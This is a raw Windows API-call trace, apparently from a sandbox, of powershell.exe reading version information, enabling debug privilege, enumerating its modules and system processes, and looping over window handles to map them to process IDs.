	[0579.297] CoTaskMemAlloc (cb=0x44) returned 0x89e80
	[0579.297] lstrcpyW (in: lpString1=0x89e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0579.298] CoTaskMemFree (pv=0x89e80) 
	[0579.298] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d07670, puLen=0x26daa0) returned 1
	[0579.298] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0579.298] CoTaskMemAlloc (cb=0x58) returned 0xa5450
	[0579.298] lstrcpyW (in: lpString1=0xa5450, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0579.298] CoTaskMemFree (pv=0xa5450) 
	[0579.298] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d076ec, puLen=0x26daa0) returned 1
	[0579.298] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0579.298] CoTaskMemAlloc (cb=0x20) returned 0x14b520
	[0579.298] lstrcpyW (in: lpString1=0x14b520, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0579.298] CoTaskMemFree (pv=0x14b520) 
	[0579.298] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d07394, puLen=0x26daa0) returned 1
	[0579.298] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0579.298] CoTaskMemAlloc (cb=0x66) returned 0x1451e0
	[0579.298] lstrcpyW (in: lpString1=0x1451e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0579.298] CoTaskMemFree (pv=0x1451e0) 
	[0579.298] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x0, puLen=0x26daa0) returned 0
	[0579.298] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x0, puLen=0x26daa0) returned 0
	[0579.298] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x0, puLen=0x26daa0) returned 0
	[0579.298] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26da78, puLen=0x26da70 | out: lplpBuffer=0x26da78*=0x2d0733c, puLen=0x26da70) returned 1
	[0579.299] CoTaskMemAlloc (cb=0x204) returned 0xf4680
	[0579.299] VerLanguageNameW (in: wLang=0x0, szLang=0xf4680, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0579.301] CoTaskMemFree (pv=0xf4680) 
	[0579.301] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\", lplpBuffer=0x26dac8, puLen=0x26dac0 | out: lplpBuffer=0x26dac8*=0x2d072c8, puLen=0x26dac0) returned 1
	[0579.307] GetCurrentProcessId () returned 0xcb0
	[0579.323] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26c9f0 | out: lpLuid=0x26c9f0*(LowPart=0x14, HighPart=0)) returned 1
	[0580.965] GetCurrentProcess () returned 0xffffffffffffffff
	[0580.966] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26ca10 | out: TokenHandle=0x26ca10*=0x2f0) returned 1
	[0580.967] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2d0ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0580.968] CloseHandle (hObject=0x2f0) returned 1
	[0580.973] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcb0) returned 0x2f0
	[0580.982] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2d0ab80, cb=0x200, lpcbNeeded=0x26da28 | out: lphModule=0x2d0ab80, lpcbNeeded=0x26da28) returned 1
	[0580.984] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f370000, lpmodinfo=0x2d0adf0, cb=0x18 | out: lpmodinfo=0x2d0adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0580.986] CoTaskMemAlloc (cb=0x804) returned 0x151f60
	[0580.986] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f370000, lpBaseName=0x151f60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0580.986] CoTaskMemFree (pv=0x151f60) 
	[0580.987] CoTaskMemAlloc (cb=0x804) returned 0x151f60
	[0580.987] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f370000, lpFilename=0x151f60, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0580.987] CoTaskMemFree (pv=0x151f60) 
	[0580.988] CloseHandle (hObject=0x2f0) returned 1
	[0580.998] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xcb0) returned 0x2f0
	[0581.002] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x26db58 | out: lpExitCode=0x26db58*=0x103) returned 1
	[0581.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d0b088, Length=0x20000, ResultLength=0x26db20 | out: SystemInformation=0x12d0b088, ResultLength=0x26db20*=0x34de8) returned 0xc0000004
	[0582.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d2b0b8, Length=0x375e8, ResultLength=0x26db20 | out: SystemInformation=0x12d2b0b8, ResultLength=0x26db20*=0x34de8) returned 0x0
	[0582.713] EnumWindows (lpEnumFunc=0x2a266ac, lParam=0x0) returned 1
	[0586.845] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.845] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x558
	[0586.846] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.846] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.846] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.846] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x538
	[0586.846] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.846] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x778
	[0586.846] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x778
	[0586.847] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.847] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.847] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.847] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.847] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.847] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.847] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.847] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.848] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x460
	[0586.848] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.848] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.848] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x3a8
	[0586.848] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1bd0
	[0586.848] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1bfc
	[0586.848] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1a78
	[0586.848] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1b90
	[0586.849] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1b04
	[0586.849] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1b34
	[0586.849] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1b64
	[0586.849] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1bb0
	[0586.849] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1acc
	[0586.849] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1a2c
	[0586.849] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x19a8
	[0586.849] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1944
	[0586.850] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x18c8
	[0586.850] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x18ac
	[0586.850] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x18ec
	[0586.850] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1898
	[0586.850] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xc98
	[0586.850] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x153c
	[0586.850] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1808
	[0586.850] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x12a4
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1740
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x16c4
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1820
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x16ac
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1858
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1664
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x10b4
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x10ac
	[0586.851] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x10ec
	[0586.852] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1068
	[0586.852] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x17e0
	[0586.852] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x102c
	[0586.852] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x17a4
	[0586.852] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1050
	[0586.852] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1694
	[0586.852] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1770
	[0586.852] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1720
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x165c
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1578
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x16c0
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x161c
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1638
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x15c8
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1554
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1674
	[0586.853] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1520
	[0586.854] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x14bc
	[0586.854] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xf8c
	[0586.854] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xe9c
	[0586.854] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1434
	[0586.854] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x14ec
	[0586.854] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xfcc
	[0586.854] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x12ac
	[0586.854] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1484
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x934
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xc0c
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xb08
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x948
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1178
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x13e0
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xcd0
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x13fc
	[0586.855] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xdc8
	[0586.856] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xc18
	[0586.856] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xc2c
	[0586.856] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xa1c
	[0586.856] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1244
	[0586.856] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xdb0
	[0586.856] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1398
	[0586.856] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1358
	[0586.856] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1370
	[0586.857] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1340
	[0586.857] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x130c
	[0586.857] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x12c0
	[0586.857] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x12e4
	[0586.857] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1270
	[0586.857] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1298
	[0586.857] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x120c
	[0586.859] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x122c
	[0586.859] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x11c4
	[0586.859] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x11b0
	[0586.859] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1188
	[0586.859] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1148
	[0586.859] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1160
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x10fc
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xe34
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xea4
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x514
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xe48
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xbc8
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xdf8
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x318
	[0586.860] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xcac
	[0586.861] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x8bc
	[0586.861] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xf9c
	[0586.861] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xf48
	[0586.861] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xe40
	[0586.861] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xecc
	[0586.861] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xeb8
	[0586.861] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xe80
	[0586.861] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xe98
	[0586.862] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xe60
	[0586.862] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xee4
	[0586.862] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xf00
	[0586.862] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xdf0
	[0586.862] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xe1c
	[0586.862] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xdd0
	[0586.862] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xd94
	[0586.862] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xd74
	[0586.863] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xd00
	[0586.863] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xcd8
	[0586.863] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xc84
	[0586.863] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xca4
	[0586.863] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xc64
	[0586.863] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xc24
	[0586.863] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xb84
	[0586.863] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xbac
	[0586.864] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x384
	[0586.864] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xab8
	[0586.864] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x33c
	[0586.864] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xa44
	[0586.864] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xa64
	[0586.864] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x8a8
	[0586.864] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xaf0
	[0586.864] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x88c
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xb04
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x910
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x230
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xac0
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xab4
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xaac
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x3d0
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x978
	[0586.865] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xa7c
